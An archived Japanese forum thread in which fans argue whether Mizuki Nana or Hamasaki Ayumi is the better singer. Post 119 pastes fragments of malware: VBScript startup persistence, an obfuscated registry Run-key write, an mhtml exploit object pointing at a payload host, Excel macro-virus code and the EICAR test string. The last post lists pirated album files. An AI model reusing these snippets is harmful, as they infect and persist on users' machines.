5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

水樹奈々>>>>浜崎あゆみ

1 :どっちの名無しさん?:2005/09/04(日) 19:30:29
よく比較されるけど
歌唱力、ルックス、カリスマ性・・・
どれをとっても水樹の足元にもおよばない浜崎

2 :どっちの名無しさん?:2005/09/04(日) 19:31:00
2

3 :どっちの名無しさん?:2005/09/04(日) 19:35:18
>>1
クソスレ立てるなブス

4 :どっちの名無しさん?:2005/09/04(日) 19:35:20
浜崎あゆみ>>>>全てにおいて<<<<<<<<<水樹
水樹?誰それシラネ。

5 :どっちの名無しさん?:2005/09/04(日) 19:49:58
みずきななって読むの?誰それ。よく比較されるけど、って、されてなくね??
ほんと誰…??

6 :どっちの名無しさん?:2005/09/04(日) 19:53:28
      ∧_∧      ∧_∧
     _( ´∀`)    (´∀` )
  三(⌒),    ノ⊃    ( >>1 )   糞スレは・・
     ̄/ /)  )      | |  |
    . 〈_)\_)      (__(___)

         ∧_∧  .∧_∧
         (  ´∀) (´∀` )
       ≡≡三 三ニ⌒) >>1 .)    立てんなって
        /  /)  )  ̄.| |  |
        〈__)__)  (__(___)

           ∧_∧  ,__ ∧_∧
          (    ´)ノ ):;:;)∀`)
          /    ̄,ノ'' >>1  )   言ったろうが
         C   /~ / /   /
         /   / 〉 (__(__./
         \__)\)
                      ヽ l //
            ∧_∧(⌒) ―― ★ ―――
            (    ) /|l  // | ヽ   ヴォケがーー!
           (/     ノl|ll / / |  ヽ
            (O  ノ 彡''   /  .|
            /  ./ 〉
            \__)_)


7 :どっちの名無しさん?:2005/09/04(日) 20:10:47
GTOに出てた子?

8 :どっちの名無しさん?:2005/09/04(日) 21:26:33
声優・・?

9 :ぬこ田萌之助 ◆nukoFWfHcQ :2005/09/04(日) 22:15:37
水樹奈々が分かってしまう俺は負け組

10 :どっちの名無しさん?:2005/09/04(日) 22:21:56
みずきななって…声優界から、消えたんだよね!あんなのよく声優になれたよねwそれに比べて、ayuは…この先もずっとアーティストとして、この業界に居続けるから!あたし達Fanは、ずっと応援するし!w

11 :どっちの名無しさん?:2005/09/04(日) 22:24:24
ayuリスペクト!

12 :どっちの名無しさん?:2005/09/04(日) 22:25:03
>>10
アンチ乙
クソスレあげんな

13 :どっちの名無しさん?:2005/09/04(日) 22:27:29
>>9久々にぬこ田キタ━━━━━━(゚∀゚)━━━━━━!!!
お前のコテ名って何かアニメ板がふさわしいな

14 :どっちの名無しさん?:2005/09/04(日) 22:31:57
凄い微妙なスレ発見!!
水樹奈々と浜崎あゆみを比べてみたことなんてないけど。
まぁ実力なら断然水樹奈々のが上。
浜崎は知名度だけで実力糞だからな。

15 :ぬこ田萌之助 ◆nukoFWfHcQ :2005/09/04(日) 22:32:07
>>13
何だとwww俺は今NARUTOとガッシュとプリキュアオンリーだ!
断じてアニヲタではない!www

16 :どっちの名無しさん?:2005/09/04(日) 22:38:15
いやプリキュアの時点でwww

17 :どっちの名無しさん?:2005/09/04(日) 22:42:59
ぬこ田たまに週少で見る
俺と趣味かぶってる

18 :どっちの名無しさん?:2005/09/06(火) 11:56:04
水樹奈々といえばヒナタ?

19 :どっちの名無しさん?:2005/09/22(木) 20:18:09
>>18
そうそう

水樹奈々VS浜崎あゆみといえば
「WILD EYES」VS「HEAVEN」勝負とか面白いなぁ

20 :どっちの名無しさん?:2005/09/24(土) 01:00:23
スレ違い…もとい板違い

21 :ぬこ田萌之助 ◆nukoFWfHcQ :2005/09/24(土) 02:07:16
そういや俺、意外にもヒナタに萌えたことねーわ
やっぱ今はサスケだな、ツンデレ最高

22 :どっちの名無しさん?:2005/09/24(土) 04:29:44
ぁゅ死ね

23 :どっちの名無しさん?:2005/09/24(土) 12:42:07
おまえが氏ね

24 :どっちの名無しさん?:2005/09/24(土) 21:11:10
水木菜々って誰???アニメの声優さん??なんかヲタっぽぃ…

25 :どっちの名無しさん?:2005/10/04(火) 02:51:18
ぁゅ ぃぃょ ぁゅ

26 :どっちの名無しさん?:2005/10/04(火) 07:24:09
水木って誰よ

27 :どっちの名無しさん?:2005/10/07(金) 17:43:07
水樹奈々のせいで糞スレ
お互い整形同士
水樹は歌は上手いがカリスマ性は無
あのダンスの酷さ…あゆとくらべるなよ

28 :どっちの名無しさん?:2005/10/07(金) 17:49:01
スカウトされ演歌歌手になるために上京
堀越卒
結局は演歌歌手にはなれず声優になる
人気はあるがアンチも多いのです
あの演歌すぎるビブラートが…ウザイ

29 :どっちの名無しさん?:2005/10/20(木) 02:12:21
エタブレデイリー2位おめでとう!

30 :どっちの名無しさん?:2005/10/20(木) 03:10:48
ミズキさんは声優だよ〜!
アニソンとか基本的に嫌いなワタシでもこの人のアニソンは受け入れられる。
KOTOKOも許容範囲。
ネギマ系はムリ。

31 :どっちの名無しさん?:2005/10/26(水) 10:39:02
オリコン2位なのでageておく

32 :ぬこ田萌之助 ◆nukoFWfHcQ :2005/10/31(月) 11:51:14
水樹たんってば今日の兵兵兵でるみたいだねww

33 :どっちの名無しさん?:2005/10/31(月) 12:10:04
>>30
アニヲタとみた

34 :どっちの名無しさん?:2006/03/21(火) 12:16:34
ナナン ハァハァ

35 :どっちの名無しさん?:2006/03/23(木) 18:25:46
ありあたん ハァハァ

36 ::2006/04/03(月) 11:38:02
水樹奈々って可愛いと思わないんだけど
歌は日本一上手いけどね


37 :どっちの名無しさん?:2006/04/08(土) 12:06:19
それよかアリプロの宝野アリカ女史の方が40超えて美人で歌も上手いぞ。



それにあの歌詞の世界は教養のない浜崎にはインスパイヤできないね。

38 :どっちの名無しさん?:2006/04/08(土) 13:37:13
>>36歌が上手いかどうかはともかく、誰が日本一って決めたんだ?

39 :どっちの名無しさん?:2006/04/10(月) 01:14:44
けどマジ歌うまいぜ!
右前歯がきれいに生えていれば可愛すぎだぁ!
なんで世間的に有名じゃないのか分からんよ!
声優=ヲタク という考えはダメだな、本物を見極められないぜ。
けどアユと奈々さんはいい勝負じゃないかな?
作詞・作曲してる分奈々さんのほうが才能は上だと思うが・・・

40 :mina:2006/04/10(月) 16:37:15
奈々ちゃんの方が絶対上手いし可愛いw

41 :ぬこ田萌之助 ◆nukoFWfHcQ :2006/04/28(金) 20:49:14
こいつの残テだけは認める

42 :どっちの名無しさん?:2006/04/30(日) 18:45:02
小清水

43 :どっちの名無しさん?:2006/04/30(日) 21:30:49
目のきつさは水樹の勝ち

44 :どっちの名無しさん?:2006/04/30(日) 21:33:40
機動戦士ガンダムSEEDFINAL
キャスト
ナナ=ヤマト:水樹奈々
ラクス=ヤマト:田中理恵
カナ=ヤマト:金田朋子
豪=ギュール:吉野裕行
トーマ=ハレルソン:伊藤健太郎
アリス=マビウス:川上とも子
ユリエル=セァリア:桑谷夏子
ロイ=ゼ=ヴォルフ:緑川光
リン=マシリエ:植田佳奈
カノン=グラヴィス:加瀬康之
ミルファ=エニティア:松来未拓
ユラア=フラガ:田村ゆかり
ロジャー=ゴードン:石川英朗
ウィルヘルム=アズラエル:遊佐浩二
ゼン=イワハシ:稲田徹
ガラド=ライゼン:森川智之
イリエス=ホーク:神田朱未
ユーフィ=アリエル:雪野五月
セルギア=フリウス:神奈延年
レミ=イリギセ:川澄綾子

決定



45 :どっちの名無しさん?:2006/05/03(水) 23:31:13
       (´・ω・`)

            拡大
             ↓

       /                     \
      /  ,r'"j                i^'!、  ヽ
    /   </´                `ヾ>  .:;i,
    ,l        _,._,.        _,._,.       .:.:l,
    |       < (ヅ,>      < (ヅ,>     ...:.::|
    !        ` ̄´      .   ` ̄´       ..: ::::::!
   |           ノ . : . :;i,          ... ::::::.:::|
     !          (.::.;人..;:::)      ...:.:::::.:::::::::!
    ヽ、         `´  `´    ........::..::..::.::::::::/
      \......,,,,,,,_  糞種死ね         .....:::::::::::::::::::::::::/



46 :どっちの名無しさん?:2006/05/05(金) 00:25:40
声優=ヲタ系って考えゎやっぱ間違ってる!!
だって声優の囚が全員ヲタなんて、有り得んゃん???
てヵ、奈々サン否定する囚、1回歌聞いてみるべしッッ!!!
そりゃ、ぁゅと比べたら知名度低ぃ`、歌唱力ゎ絶対奈々サンの方がだし!!

47 :どっちの名無しさん?:2006/05/05(金) 00:30:12


↓懐かしき昔のあゆ動画。この頃のあゆと水樹はどう?


@http://www.youtube.com/watch?v=VJgSntSea6s&search=SMAP


Ahttp://www.youtube.com/watch?v=5hn_2xitXzU&search=utaban%20hamasaki%20ayumi



48 :どっちの名無しさん?:2006/05/05(金) 01:07:17
なんちゃら奈々ってだれだよ

49 :どっちの名無しさん?:2006/05/05(金) 23:40:58
奈々ちゃん萌えーーーーー!!!!!!!!!
あゆ萌えーーーーーー!!!!!!!!!

50 :どっちの名無しさん?:2006/05/06(土) 21:34:56
浜崎の年越しライブとか中継されてるけど、息切れで声が聞こえない。

この事実は揺るぎないし、大きいと思う。ノシ

51 :どっちの名無しさん?:2006/05/06(土) 23:15:32
ななもえもえもえもえもえお

52 :どっちの名無しさん?:2006/05/10(水) 16:16:25
私の意見では奈々ちゃんの方実力ぁるし、
可愛ぃし綺麗w声もあゆなんヵよりも
綺麗で聞ぃてて惚れる♪(*´∀`*)
あゆも嫌ぃじゃないけど私は奈々ちゃんの方好きだなァww

53 :どっちの名無しさん?:2006/05/10(水) 16:28:47
どっちも誰?

54 :どっちの名無しさん?:2006/05/14(日) 23:55:12
ニューアルバムどーだった?
水樹奈々の。
3位だったよね

55 :どっちの名無しさん?:2006/05/15(月) 00:01:45
名前だけみるとAVちっく

56 :どっちの名無しさん?:2006/05/15(月) 03:26:22
「あっあっあっあっあっあっあっ」
「キラァキラァキラァッ・・・!」
「アス、どこっらそん、せいし、でて、ぅるの!」
「キラたんキラたんキラたん!」(せいやせいやせいや)
「も、死ぬ・・・!!」
「俺も…一緒にぃ!」
「はう もうだ め」 かくん
「死ぬ時は、一緒、ら…」 ぽくん

すごい死に方だ


57 :どっちの名無しさん?:2006/05/15(月) 11:08:45
ティム君とは続いているそうで、週間ポストに載ってあった。

58 :どっちの名無しさん?:2006/05/15(月) 20:46:18
アルバムすごぃよかった!!

59 :どっちの名無しさん?:2006/05/25(木) 16:49:54
奈々ちゃん可愛い〜w(●´U`●) 

60 :どっちの名無しさん?:2006/05/26(金) 09:02:42
うちの妹が学校で「浜崎あゆみなんてオリジナリティーがなくて音楽じゃない。アリプロが真の音楽」
って言ったら浜ヲタの連中に目をつけられて持ち物を隠されたりMDを割られたりした。
それでもめげずにアニソン好きの多い放送部でアリプロの曲を流したら放送室に浜ヲタが殴りこんできて殴られた。

アリプロの10年来のファンだという先生も巻き添えを食ったらしい

よって浜ヲタ=DQN



水樹嬢ファンも頑張れ。

61 :どっちの名無しさん?:2006/05/26(金) 09:15:31
>>>>>調査に協力した大須賀浩裕市議は「矢沢永吉や浜崎あゆみのファンのマナーは、かなりひどかった。


歌手で決まる?ファンのマナー 味スタ周辺住民アンケート
若年層で目立つゴミのポイ捨て
ttp://www.sankei.co.jp/edit/kenban/tama/060519/kiji01.html

> JリーグのFC東京、東京ヴェルディの本拠地で、コンサート会場にも使われている「味の素スタジアム」(調布市、5万人収容)の
>周辺住民を対象としたアンケート調査が18日、発表された。「地域が活性化した」など好意的な意見がある一方、コンサート客の
>ゴミのポイ捨てなどを指摘する声もあり、歌手によってファンのマナーの評価が大きく異なる結果となった。

(中略)

> マナーについての自由回答では「来場者のゴミの散乱。コンサート時はひどく、客が若いためか浜崎あゆみの時は特にひどかった」、
>「気になるのはコンサート時(浜崎あゆみ)のゴミの投げ捨て。人の玄関前に食べ残しのコンビニ弁当を捨てていった」など特定の歌手
>のファンへの苦情がみられた。
>
> 一方で、「夜遅くにゴミを拾って帰るファンのグループもあり(GLAY、SMAP)、こういうファンの多いコンサートは大歓迎」とファンの
>マナーを評価する意見もあった。
>
> 飛田給在住でアンケート調査に協力した大須賀浩裕市議は「矢沢永吉や浜崎あゆみのファンのマナーは、かなりひどかった。
>周辺住民のためにもマナー向上に努めてほしい」と話している。

62 :どっちの名無しさん?:2006/05/29(月) 16:35:53
奈々ちゃん歌うまぃw
可愛ぃし魅力的☆
歌手の奈々ちゃんが大好きですw

63 :どっちの名無しさん?:2006/06/03(土) 12:56:31
亞里亞

64 :どっちの名無しさん?:2006/06/03(土) 13:04:01
しらね

65 :どっちの名無しさん?:2006/06/03(土) 13:12:28
>>60
今の中高生にハマヲタなんてほとんどいないよ

66 :どっちの名無しさん?:2006/06/03(土) 13:14:58
あゅの歌詞画流行ってるし
検索してみれば?    まぁ一部の厨房かもね

67 :どっちの名無しさん?:2006/06/03(土) 17:55:48
>>65
今高Aだけど本当あゆファンいないね。友達もやっぱり…雰囲気が…って。2人男子が前好き!あゆは整形じゃない!って言ってた(笑)そのうち1人彼氏ww

68 :どっちの名無しさん?:2006/07/12(水) 13:22:11
このスレ荒れてんのか和んでんのかワカンネwwwwww
俺も奈々好きだよ。あゆはウンコー●●●ヽ( ・∀・)ノ●●●
だが

69 :どっちの名無しさん?:2006/07/23(日) 16:59:59
>>67
 普通に見てあゆは間違いなく整形だろ 結構前から見比べれば顔が違いすぎだ
 水樹奈々じゃあゆにはカリスマ性じゃ間違いなく負けているし歌唱力も劣っている が
 俺は水樹奈々が大好きだー!!!!!


70 :どっちの名無しさん?:2006/07/23(日) 17:06:37
どう見ても奈々ちゃんはかわいいです
本当にありがとうございました

71 :どっちの名無しさん?:2006/07/23(日) 17:30:10
>水樹奈々じゃあゆにはカリスマ性じゃ間違いなく負けているし歌唱力も劣っている 

歌唱力劣ってないでしょ?

72 :どっちの名無しさん?:2006/07/23(日) 17:31:35
平野綾が好き

73 :どっちの名無しさん?:2006/07/23(日) 17:50:32
 歌唱力ヲトッテマスヨ あゆよりも水樹奈々を見る機会が多いと水樹奈々のほうが
 うまく感じるけどあゆもアコースティックとかのを聞くとスゴイよ
 love-destiny- とか凄く良かった だがしかし
 奈々ちゃんのアコースティックバージョンのBrilliant Starはいつ聞いても
 鳥肌が立つほど素晴らしい まあ何が言いたいかというと
 俺は水樹奈々が大好きだー!!!!!



74 :どっちの名無しさん?:2006/07/23(日) 20:21:16
ミズキ? って誰?
ゥチ中三で浜崎あゆみすきやけど(-.-;
ミズキ?って人のファンなんてきいたことない

75 :アナルファッカーJUN:2006/07/23(日) 20:23:04
年下には興味ないから安心しろっちゅーの

76 :どっちの名無しさん?:2006/07/25(火) 04:06:20
あゆは整形じゃないお

77 :どっちの名無しさん?:2006/07/25(火) 23:57:53
>>72
きめぇ

78 :どっちの名無しさん?:2006/07/26(水) 00:45:36
>>74
知らないなら、書くな。
あんた、Aho?

79 :どっちの名無しさん?:2006/07/26(水) 09:52:58
水樹は漏れの地元出身だけど、チケは余りまくりだし同じ地元出身のジャパハリネットやランクヘッドの方が知名度高い。

80 :どっちの名無しさん?:2006/07/27(木) 02:57:46
きっと声優=ヲタ系という考えをしているヤツは
声優だという事実を知らず、エイベックソ所属となっていて、曲調が良ければ買うんだろな
水樹奈々の事は大分前に知り合いに曲聴かされて知ったけど、
結構良い感じの曲でした。歌唱力もあったし。
アユより全然良い。

81 :どっちの名無しさん?:2006/07/27(木) 11:15:26
本当に水樹がいいと思う?声優が歌手?ワロスww

82 :どっちの名無しさん?:2006/07/27(木) 11:36:11
>>81
CD出すならそうじゃないの

83 :どっちの名無しさん?:2006/07/28(金) 00:56:28
>>81
職業は関係ないかと
歌手って仕事は歌唱力しだいだろ

84 :どっちの名無しさん?:2006/07/28(金) 01:08:55
この水樹って奴は、声優だったのかw
なんかギャオのなんかの番組で、
「声優は二次元と三次元をつなぐ架け橋だ」とか
訳分からん事ホザいてたイタいオタクがいたが、そんな奴らに指示されてるのを声優って言うんだろw
確かに浜崎は歌唱力クソだと思うが、単純に度を越えての声優の方がヤヴァい気がするw

85 :羽矢:2006/07/30(日) 19:18:18
水樹奈々さんはとても素晴らしい方です。あの歌唱力はそこら辺の歌手よりも上手いです。奈々さんを余り知らない人も居ますが…。eternal blazeとゆう曲はめっちゃいい曲。オリコンで二位を取ってました

86 :どっちの名無しさん?:2006/07/31(月) 02:01:05
平野綾が一番かわいいということで糸冬了

87 :どっちの名無しさん?:2006/07/31(月) 15:45:09
innocent starterがいいよ
と、水樹奈々と誕生日が同じ自分が言ってみる。

88 :どっちの名無しさん?:2006/07/31(月) 15:50:40
ってか水樹奈々って誰だよ??????????
存在すらしらね〜〜〜〜〜
つ〜か存在感ね〜〜〜
「浜崎あゆみ」っつったら
誰もが知ってるぞ???!!!!!!

89 :どっちの名無しさん?:2006/07/31(月) 15:58:55
ぶっちゃけ、顔はハマの方が可愛いけど、歌唱力は、水樹の足元にも及ばないよ、ハマ。


90 :どっちの名無しさん?:2006/07/31(月) 16:02:30
ってか水樹って誰〜〜〜〜〜〜〜〜〜????????

91 :どっちの名無しさん?:2006/07/31(月) 22:56:21
>>90
そんぐらい、自分でググレ。

92 :どっちの名無しさん?:2006/08/01(火) 01:04:48
>>86
きめぇ

93 :どっちの名無しさん?:2006/08/01(火) 04:18:35
平野綾は宇宙一かわいい

94 :どっちの名無しさん?:2006/08/01(火) 22:49:18
あゆも水樹も好き
・・でも
ホントはあゆの方が好き!w

95 :Dr.SA-BOY ◆vAhjUcE6us :2006/08/02(水) 01:05:06
椎名へきるにはかなわないぞ。
水樹君は声の質が並。歌唱力もso so goodっというほど。
なお、あゆ様については別格。

96 :どっちの名無しさん?:2006/08/04(金) 20:05:49

奈々嬢を知らねーヤツは
キングレコードをミロ

97 :どっちの名無しさん?:2006/08/06(日) 12:59:44
水樹奈々かわいすぎ
歌唱力高すぎ
萌えすぎ

98 :どっちの名無しさん?:2006/08/20(日) 00:54:34


99 :どっちの名無しさん?:2006/08/20(日) 00:58:04
ここヲタばっか

100 :どっちの名無しさん?:2006/08/20(日) 01:00:00
水樹歌上手いよな

101 :どっちの名無しさん?:2006/08/27(日) 02:20:40
浜崎は弱弱しい(しかもぶりっ子っぽい。)
が、水樹奈々はどこか力強いイメージがある。


102 :どっちの名無しさん?:2006/08/27(日) 08:45:45
水樹?だれそれ?一般人はしらないよ。


103 :どっちの名無しさん?:2006/08/27(日) 10:45:25
うんこ >> 水樹

104 :どっちの名無しさん?:2006/08/27(日) 11:51:12
http://plaza.rakuten.co.jp/kikyo315/bbs/

105 :どっちの名無しさん?:2006/08/29(火) 02:09:57
水樹って誰?新人歌手?

106 :どっちの名無しさん?:2006/08/29(火) 08:45:30
知名度
和田アキコ>>>>>>>>>>>>>>水樹奈々=浜崎あゆみ

こんな感じだろ

107 :どっちの名無しさん?:2006/08/29(火) 14:10:07
だから水樹なんて知ってる人の方が少ないって(笑)
てか水樹って最高オリコン何位なの?

108 :どっちの名無しさん?:2006/08/29(火) 16:20:42
声優に負けてる安室wwwwwwwwwwwwww


http://www.ytv.co.jp/geikoi/ranking/ranking0619.html
1 上戸彩
2 仲間由紀恵
7 大塚愛
20 倖田來未
23 浜崎あゆみ
33 柴咲コウ
34 松浦亜弥
35 aiko
36 BoA
39 木村カエラ
40 倉木麻衣
40 鈴木亜美
47 安倍なつみ
53 YUKI
65 水樹奈々
71 安室奈美恵
71 中島美嘉
71 持田香織
74 宇多田ヒカル


109 :どっちの名無しさん?:2006/08/29(火) 16:22:08
あ、書き忘れたが恋人にしたいランクな>>108

110 :どっちの名無しさん?:2006/08/30(水) 05:32:17
知名度の低さを考えると65位は高いな

111 :どっちの名無しさん?:2006/09/03(日) 16:15:27
あゆは別に嫌いじゃないけど・・ 
奈々ちゃんが大好きw●・∀・)

112 :どっちの名無しさん?:2006/09/03(日) 21:07:03
誰だよ水樹って?
どこのどいつ?
一般人?
一般人以下?
有名なんかじゃないよね〜

113 :どっちの名無しさん?:2006/09/03(日) 21:41:55
>>108
水樹すげー

114 :どっちの名無しさん?:2006/09/04(月) 08:59:16
まあ、歌唱力だけなら
水樹>>>>>>>>>>>>>ハマ


115 :どっちの名無しさん?:2006/09/05(火) 20:32:19
歌詞や音楽パクりまくりで他の曲から流用して金を取ってる腐女子にしか人気が無い糞浜崎と
オリジナルの素晴らしい歌声で人々を魅了する水樹奈々。

ププッ、比べ物にもならないなwwwwwww

116 :どっちの名無しさん?:2006/10/06(金) 16:43:53
絶対水樹奈々!!歌めちゃ上手いし。可愛いし。
あゆ昔は好きだったけど今微妙。

117 :どっちの名無しさん?:2006/10/07(土) 23:21:17
腐女子にしか人気が無いと言ってる時点で
男人気に僻む女だな

118 :どっちの名無しさん?:2006/10/09(月) 07:07:00
全員、ここに書き込んでる時点で皆、仲間 (´∀`)b

119 :どっちの名無しさん?:2006/10/09(月) 07:08:21
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???????

120 :どっちの名無しさん?:2006/10/09(月) 11:14:41
>>1よく比べられるって…
有名なの?誰?

121 :どっちの名無しさん?:2006/10/29(日) 19:19:58
オレが知らない歌手は無名
よって浜崎>>>>>>>水樹とか言う無名歌手

122 :どっちの名無しさん?:2006/11/03(金) 11:59:42
         \      /
    ・      \ /
        ;(●)llll((●);
       (●)(●)(●)(●)
 \__ (●)(●)●)●)(●)__/ カサカサ
      (●)(●)(●)(●)(●)
   __(●)((●`∀´●))(●)__  水樹奈々が通りますよ
 /  (●)(●)(●)(●)(●)(●)   \
   _ (●)(●)(●)(●)(●)(●)_ 
 /  (●)(●)(●)(●)(●)(●)  \
    _(●)(●)●)(●)(●)(●)_
  /  (l●)(●)(●)(●)(●l;)  \
  | .  (l;●)(●)(●)(●)(●)    |
  |  . (0●)(●)(●)(●)O)    |.   カサカサ
  ,;;    (:●)●)(●)(●;)      。
       (о●)(●)●0)
         ( ;●ξ●:)
    。      ・


123 :どっちの名無しさん?:2006/11/04(土) 16:12:07
水樹がいいとは思わないが浜崎よりはいい
周知の事実

124 :どっちの名無しさん?:2006/11/05(日) 13:15:21
当たり前
水樹に失礼

125 :どっちの名無しさん?:2006/11/12(日) 08:56:16
>>121
精神科いってこいよ

126 :どっちの名無しさん?:2006/11/22(水) 01:05:32
水樹またHEY出るね
声優も歌手もこなせるのすごすぎ

127 :旅人:2006/11/30(木) 03:00:54
水樹奈々さんを呼び捨てにすんなよ

128 :どっちの名無しさん?:2006/11/30(木) 03:16:48
浜崎は若いころモデルと女優もやってましたよ

129 :どっちの名無しさん?:2006/11/30(木) 03:18:52
歌手、モデル、女優、番組司会(ayu ready?)ができる浜崎あゆみ凄すぎ

130 :どっちの名無しさん?:2006/11/30(木) 03:24:58
浜崎の完勝

131 :旅人:2006/11/30(木) 08:35:59
やっぱりどう考えても水樹奈々さん

132 :どっちの名無しさん?:2006/11/30(木) 16:08:55
浜崎短足。

133 :どっちの名無しさん?:2006/11/30(木) 16:12:13
やっぱりどう考えても浜崎あゆみさん

134 :どっちの名無しさん?:2006/12/02(土) 14:52:33
どっちもどっちだと思。変わらない。

135 :どっちの名無しさん?:2006/12/03(日) 01:38:44
俺両方大好き。
比べられない。

136 :どっちの名無しさん?:2006/12/06(水) 13:45:04
浜崎なんてもう終わっただろ
水樹は今すげえ人気だし

137 :どっちの名無しさん?:2006/12/10(日) 06:33:42
うん、浜崎なんて今は腐女子にしか売れてない。
浜崎が人気だってことはそれだけニッポンに腐女子が居るってコト。
・・・・もし浜崎が売れてたら日本モウダメ状態だったなw

138 :どっちの名無しさん?:2006/12/10(日) 06:35:13
>>102つまりお前の屁理屈では日本には一般人がほとんどいないという事になるな。

139 :どっちの名無しさん?:2006/12/10(日) 17:12:24
腐女子に人気なんて初めて知った。
宇多田じゃないのか?腐女用のファンスレもあったし
浜崎にはない

140 :どっちの名無しさん?:2006/12/10(日) 21:33:40
浜崎あゆみの「失われた神通力」

ttp://news.www.infoseek.co.jp/entertainment/music/story/10gendainet07021684/

141 :どっちの名無しさん?:2006/12/13(水) 22:34:49
>81 
声優が歌手になっちゃいけないわけ?
あんたの言い方はそう聞こえるけど?

142 :どっちの名無しさん?:2006/12/13(水) 22:41:21
水樹奈々さん知らないならかきこむんじゃねえよ。

143 :どっちの名無しさん?:2006/12/13(水) 23:39:45
早く声優辞めて欲しい。邪魔だよ

144 :どっちの名無しさん?:2006/12/13(水) 23:45:25
一般人は水樹の事なんか知らんだろ、知ってんのはオタクだけ

145 :どっちの名無しさん?:2006/12/13(水) 23:58:30
歌唱力あるってのは認めるけどさ…
演技下手、キャラソン歌えない。声優としてはダメダメ。

146 :どっちの名無しさん?:2006/12/14(木) 01:09:12
>>136あなたの世界で終ってていーよw

147 :どっちの名無しさん?:2006/12/15(金) 20:04:04
>>145
キャラ声で歌ってるキャラソンも一応ある。
なんでキャラ声で歌わんのかは知らんが

ttp://www.youtube.com/watch?v=VVrn69xm8B8
ttp://www.youtube.com/watch?v=AXhPsHwrJR0
ttp://www.youtube.com/watch?v=4-qBTUnCpwU

148 :どっちの名無しさん?:2006/12/20(水) 22:22:48
まあ歌は水樹のが上なのは間違いないが・・・

149 :どっちの名無しさん?:2006/12/25(月) 20:32:45
このスレまだあんのか

150 :どっちの名無しさん?:2006/12/25(月) 21:38:03
メイビー 青い色 私たちは〜〜♪

↑これいい曲だね

151 :どっちの名無しさん?:2006/12/26(火) 23:51:25
歌唱力    水樹>>>>>>浜崎

容姿     浜崎≒水樹

カリスマ性  浜崎>>>>>>>>>>>>>水樹

152 :どっちの名無しさん?:2006/12/28(木) 08:31:52
>>144
つまりお前のものすごく頭が悪い屁理屈では日本中がオタクだと言う事になるなw頭悪ぃwwww

153 :どっちの名無しさん?:2006/12/30(土) 15:31:05
近藤 奈々

154 :どっちの名無しさん?:2007/01/07(日) 00:07:20
>>152
(´゚д゚)?

155 :どっちの名無しさん?:2007/01/07(日) 00:32:26
>>154
>>152は水樹を知らない奴なんか日本にいない、ってことをいいたいんだろ。
ワロスワロス

156 :どっちの名無しさん?:2007/01/07(日) 19:16:28
腐女子の意味履き違えてる奴がいるな
ホモ好きな女を指すんだよ

157 :どっちの名無しさん?:2007/01/13(土) 16:29:51
奈々ちゃんは最近一般人にも知られてきてるよ

158 :どっちの名無しさん?:2007/01/13(土) 16:34:58
217 :スペシャルな亜美と僕 ◆vSlHm02TeU :2006/12/23(土) 17:06:53
亜美たんの下痢飲みたいな

298 :スペシャルな亜美と僕 ◆vSlHm02TeU :2006/12/24(日) 09:29:13
亜美さまの下痢を夢で飲みました。

159 :どっちの名無しさん?:2007/01/21(日) 13:16:04
今の浜崎だったら本当に水樹より歌下手なんじゃないか?
めちゃくちゃ苦しそうに歌ってるし

160 :どっちの名無しさん?:2007/01/21(日) 13:27:41
でも同時発売したら、浜崎>水樹

161 :ゆな:2007/01/21(日) 13:32:14
ヲタじゃないけど一昨年前水樹奈々しってファンになりました。
ベストがでるみたいで絶対買います

162 :どっちの名無しさん?:2007/01/22(月) 10:44:15
田村ゆかり最強

浜崎あゆみはさらにその上を行く

163 :どっちの名無しさん:2007/01/22(月) 11:33:43
ミスアンまで浜のこと大嫌いで
浜の歌は全部一緒に聞こえてた。
カラオケで歌うこともなく、
レンタルもしたことがなかった。
正直、早く消えろ〜〜〜って思っていたアンチの一人だが・・
ミスアン聞いて大ファンになってしまった。
ミスアンのライブにも参戦。
後にマイストライブ見たけど浜が
こんなにも才能があるとは・・・寝耳に水状態。
全盛期を知らない自分は今の浜が一番輝いて見える。
特にボリデリ最高なんだけどねぇ。
昔の歌より最近の曲の方が好き。
BESTU楽しみにしている。
ネットで叩かれているけど浜にはこれからも頑張ってもらいたい。
アンチも多いけど応援している人もたくさんいる。
浜、これからも頑張れ♪

164 :どっちの名無しさん?:2007/01/29(月) 06:25:47
【歌手声優】水樹奈々ちゃんスッピンになる★77

http://www.kzstation.com/blog/archives/051213tue_m.html

http://www.kzstation.com/blog/archives/051220tue_m.html

http://www.kzstation.com/blog/archives/051213tue_5.html

http://www.kzstation.com/blog/archives/051115tue_n.html

http://www.kzstation.com/blog/archives/051122tue_5.html



165 :どっちの名無しさん?:2007/01/29(月) 14:22:40
↑誰こいつ
知名度もない等しい人間と一度は天下を取った人間を比べる事自体間違ってる。

166 :どっちの名無しさん?:2007/02/03(土) 11:22:20
奈々さんはあゆのライヴに行ったことがある。

167 :どっちの名無しさん?:2007/02/07(水) 23:11:51
(アルバム) [070207] THE MUSEUM - 水樹奈々 (LameCBR 192kbps).rar 122,122,996 88addcab0ef5712b552aaaf7662069b1

(アルバム)(声優)[070207] 水樹 奈々-THE MUSEUM.rar 94,662,048 f78702bc321672003e3613d43e62ff6e8c7c2395

